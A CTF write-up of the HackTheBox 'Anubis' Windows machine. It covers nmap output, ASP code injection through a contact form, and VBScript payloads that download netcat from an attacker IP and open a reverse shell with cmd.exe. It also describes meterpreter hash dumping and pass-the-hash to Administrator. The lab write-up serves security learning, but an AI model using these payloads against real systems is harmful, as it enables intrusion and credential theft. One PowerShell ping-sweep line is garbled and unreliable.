CTF-Writeups/HackTheBox/Anubis.md

HackTheBox-Anubis

NMAP

PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
443/tcp   open  ssl/http      syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                               
|_http-title: Not Found                                 
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb                          
| Issuer: commonName=www.windcorp.htb                                     
| Public Key type: rsa                 
| Public Key bits: 2048                                                   
| Signature Algorithm: sha256WithRSAEncryption                            
| Not valid before: 2021-05-24T19:44:56                                   
| Not valid after:  2031-05-24T19:54:56                                           |_  http/1.1                         
445/tcp   open  microsoft-ds? syn-ack ttl 127                             
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49715/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC          
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                  
Host script results:                 
|_clock-skew: mean: 0s, deviation: 0s, median: 0s                         
| p2p-conficker:                     
|   Checking for Conficker.C or higher...                                 
|   Check 1 (port 29263/tcp): CLEAN (Timeout)                             
|   Check 2 (port 29705/tcp): CLEAN (Timeout)                             
|   Check 3 (port 30756/udp): CLEAN (Timeout)                             
|   Check 4 (port 64422/udp): CLEAN (Timeout)                             
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:                
|   2.02:                            
|_    Message signing enabled and required                                
| smb2-time:                         
|   date: 2021-08-15T05:00:49                                             
|_  start_date: N/A                  
     

PORT 139/445 (SMB)

We can see that smb is running but we can't access any shares as anonmyous

So let's move on to https

PORT 443 (HTTPS)

If we try to visit https we would get 404 not found , but looking at nmap scan we can see that from the ssl certificate it found a domain name www.windcorp.htb so let's add it in our /etc/hosts file

I tried running gobuster to fuzz for files and directories but not found nothing interesting

So scrolled down and saw a Contact form where we can send message so , I intercepted the request to see if it actually sends a message

It's taking those input fields as GET parameter values in save.php and brings us to preview.php to ask for confirmation

After that nothing happens, I ran gobuster again by specifiying asp extensions and saw that there's a file created Test.asp with message details that we gave

We can see it's showing the message details that we inputted in the contact form in asp page (Active Server page) which is framework for building web pages for IIS (windows server), so we can try if we can include asp syntax , a basic syntax to check is

<% Response.write("Hello") %>

Make sure to url encode it as you submit it through burp suite

And it gets rendered , we can try to supply a wrong syntax

So we defaintely can run any asp syntax or even run a vbs script here , in order to get command execution we can do something like this

https://www.tek-tips.com/viewthread.cfm?qid=180982

<%

Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c ping 10.10.14.18 ", 1, True

%>

Now we have a command execution and we can simply just upload a netcat executable for windows in C:\Windows\Temp and then call that to get a reverse shell

<%

Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c curl http://10.10.14.18/nc64.exe -o C:\Windows\Temp\nc.exe ", 1, True

%>

It made a request for downloading netcat so we now just need to execute it

<%

Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c C:\Windows\Temp\nc.exe 10.10.14.18 4444 -e cmd.exe ", 1, True

%>

Even tho we are authoirty\system but the hostname is webserver01 , we can the IP address from which it seems we are in containered environment

We need to break out of this containered environment windows server , so looking at the users we see containered user and administrator

But there isn't anything in those directory other than req.txt in Administrator's folder

This looks like a ssl certificate so we can use any online tool to decode it into clear text form

https://certlogik.com/decoder/

We get a subdomain softwareportal.windcorp.htb

172.23.176.172 - ip 172.23.176.1 -dg 172.23.191.255 1..255 | % {echo "172.23.191.$"; ping -n 1 -w 100 172.23.191.$} | Select-String ttl

Uninteded Way

We could get a meterpreter shell and dump the hashes through it

On dumping we can see some hashes and this is kinda rare to see that we can do pass the hash attack here with Administrator user by trying the iisadmin hash

We get a Pwn3d! which means that we can now get a shell

Doing whoami through this shell

Or we could use metasploit without needing impacket scripits, there's a psexec module in metasploit that we can use to get a shell

To get a fully functional meterpreter shell we need to upload the meterpreter payload and execute it so , upload the payload , start another meterpreter listener

We can dump hashes using `hashdump` and see that the Administrator's hash does match with `iisadmin`

We got root on the actual host machine with uninteded which would get patched so in the end intended is always the way